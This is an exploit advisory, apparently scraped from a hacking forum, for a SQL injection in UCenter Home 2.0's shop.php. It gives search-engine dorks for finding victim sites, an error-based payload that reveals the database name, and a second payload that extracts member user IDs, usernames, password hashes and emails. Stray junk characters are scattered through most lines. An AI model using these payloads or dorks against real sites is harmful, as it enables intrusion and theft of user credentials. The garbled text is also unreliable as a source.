: i3 Q2 N, Q7 o8 L. O__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
; J+ b# ? R3 h; @$ x
% O8 M6 c7 k& \! F4 K
- T$ O& ]( |0 O, q! \5 V( m3 F; ?
* C0 F5 l \3 ]- D9 {" w*/ Author : KnocKout - i i# b3 s F7 A. r0 S
. k: @& d% c1 d: ^1 k$ o' _
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers # {! W' v$ Q; ~* J* n
. m& ^5 G. U& c( X, m*/ Contact: knockoutr@msn.com
. Z, n" z% V: q: _2 g9 q) b6 E' C. e# T$ a5 X: Z; ]1 K1 m
*/ Cyber-Warrior.org/CWKnocKout + D% `% n8 O' W
' F1 G( ~$ g7 f }! y( C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! @' X& V2 A! ?, E/ k
9 A) L! l4 ~: lScript : UCenter Home 5 N) Z X0 i9 C1 E+ q7 r
$ d" o; B9 h; a9 w# P+ hVersion : 2.0
8 A3 r' B& z+ h i
/ U! A2 w& w% |! X$ f9 zScript HomePage : http://u.discuz.net/
" e- H# B$ L' l# W- j; D. B
Z9 d4 }0 n ` J/ g__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & i$ _, `, k9 Q" Y7 u
/ S. t. ` c: m6 T+ l6 M2 \/ s; fDork : Powered by UCenter inurl:shop.php?ac=view
+ g6 l, R6 _* O8 M: b3 M! A2 X9 [' F5 N6 N \* c2 r
Dork 2 : inurl:shop.php?ac=view&shopid=
9 t7 i& J* C R
6 ^2 Q4 _ _% A( C__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% ~8 n5 Q$ z$ [1 L$ @7 x5 L1 S# V: o7 M$ w' g
Vuln file : Shop.php
5 L3 u$ [1 j0 C$ t5 @, X c2 Y
, F r; \: `: F; c2 Z$ f' Lvalue's : (?)ac=view&shopid=
& G/ o# a8 e6 R9 R9 j% @' V' c0 V6 |6 w; b M1 D$ i: K: y# `
Vulnerable Style : SQL Injection (MySQL Error Based) - a+ b9 h; S5 i" f7 {2 A
* B- j. }% f( D/ oNeed Metarials : Hex Conversion ! r) n7 ]2 a- M X4 v, W7 ^
. V8 ~& g- ?7 C' p__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / U( ^4 x% q( L1 m
5 O/ I2 U. W- o3 |$ `6 F' j# V7 ~) j* N
Your Need victim Database name.
; D9 w3 c' |1 o! A# d) F C
5 T/ D, a9 F' X1 c, tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + |/ v+ S8 U2 p/ Y* j, q5 }
# Q+ d' V( X- N; k..
: ~: g, ~( N: S$ X7 J7 j* i9 l! i; l7 I3 N: D6 O, W
DB : Okey. : F0 ?, o& ]( L. L- s" U( I
* h y: i8 e! B2 b" hyour edit DB `[TARGET DB NAME]` - }( M' i9 P7 p$ n& E5 w4 X
/ d( h. X _$ q% PExample : 'hiwir1_ucenter'
$ _) ]3 y+ M% P: q* [5 n/ X, T/ G% I# }) s
Edit : Okey. ( ~2 k/ J+ N- o5 ~. f; u
; H, K1 k+ T" l6 e" h/ {Your use Hex conversion. And edit Your SQL Injection Exploit.. 7 j7 g5 F- e2 r/ y R, N
' J. y8 C3 c r6 ?# |: ~3 u$ o
3 C7 ~. u* M8 c Q
% A" ]4 {' W7 M( _# J9 QExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 T4 _8 `( ?. P! T% q, ]* X# o |